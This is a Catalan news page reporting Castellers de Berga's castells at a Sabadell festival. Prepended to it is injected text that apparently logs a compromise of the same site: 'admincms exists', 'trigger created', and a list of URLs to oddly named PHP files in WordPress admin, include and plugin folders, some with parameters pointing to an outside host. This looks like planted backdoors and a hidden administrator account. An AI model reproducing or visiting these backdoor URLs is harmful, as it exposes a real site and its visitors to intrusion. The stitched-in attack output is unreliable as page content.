Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?cron https://castellersdeberga.cat/wp-admin/includes/widgets-ajax-core-ajax-ajax-response-core.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/edit-form-advanced-wp-meta.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/user/credits-core-wp-wp-wp-core-core-core.php https://castellersdeberga.cat/wp-content/plugins/google-calendar-events/google-calendar-events-cron-cron-private-meta-ajax-response-meta.php https://castellersdeberga.cat/wp-content/plugins/js_composer/vc_classmap.json-ajax-private-private-meta-wp-meta-cron-ajax-ajax-response-ajax-meta-ajax-response-private.php https://castellersdeberga.cat/wp-includes/PHPMailer/Exception-stream-wp-private-meta-wp-stream-stream.php https://castellersdeberga.cat/wp-includes/class-wp-block-type-registry-ajax-ajax-response-cron-meta.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Castells de 7 a Sabadell
 

Castells de 7 a Sabadell


Castells de 7 a SabadellEls Castellers de Berga han sumat 3 castells més de 7 pisos descarregats a la Plaça Sant Roc, de Sabadell. Han actuat a la 21a Diada dels Castellers de Sabadell, juntament amb els Castellers de la Vila de Gràcia, els Castellers de Terrassa i els amfitrions, els Castellers de Sabadell.
Els berguedans han començat la diada amb un pilar de 4 caminant. Seguidament, han continuat amb un 4 de 7 amb agulla que ha quedat amb intent desmuntat. El castell s’ha desquadrat quan l’enxaneta ja havia fet l’aleta al 4 i es muntava el pilar de 5 al mig. Amb molt treball, s’ha desmuntat el castell però no s’ha pogut considerar descarregat. Un 4 de 7, el castell que els berguedans han descarregat més vegades a la seva història, ha estat la segona construcció. A continuació, sí que s’ha descarregat el 4 de 7 amb agulla. I per tancar la diada, el 3 de 7 i el pilar de 5 descarregats. 
Els padrins dels berguedans han fet història descarregant el seu primer 3 de 9 amb folre. Aquest castell l’havien carregat al Concurs de Castells de Tarragona, el 5 d’octubre passat, i, avui, l’han descarregat. Els Castellers de Terrassa han descarregat 3 castells de 7 pisos i els de la Vila de Gràcia, 2 de 8 amb folre, 5 de 8 i 4 de 8.
Els Castellers de Berga tancaran la seva tercera temporada el proper dissabte 1 de novembre, a la Plaça del Poble Vell de Súria, acompanyats dels Salats de Súria i els Carallots de Sant Vicenç dels Horts.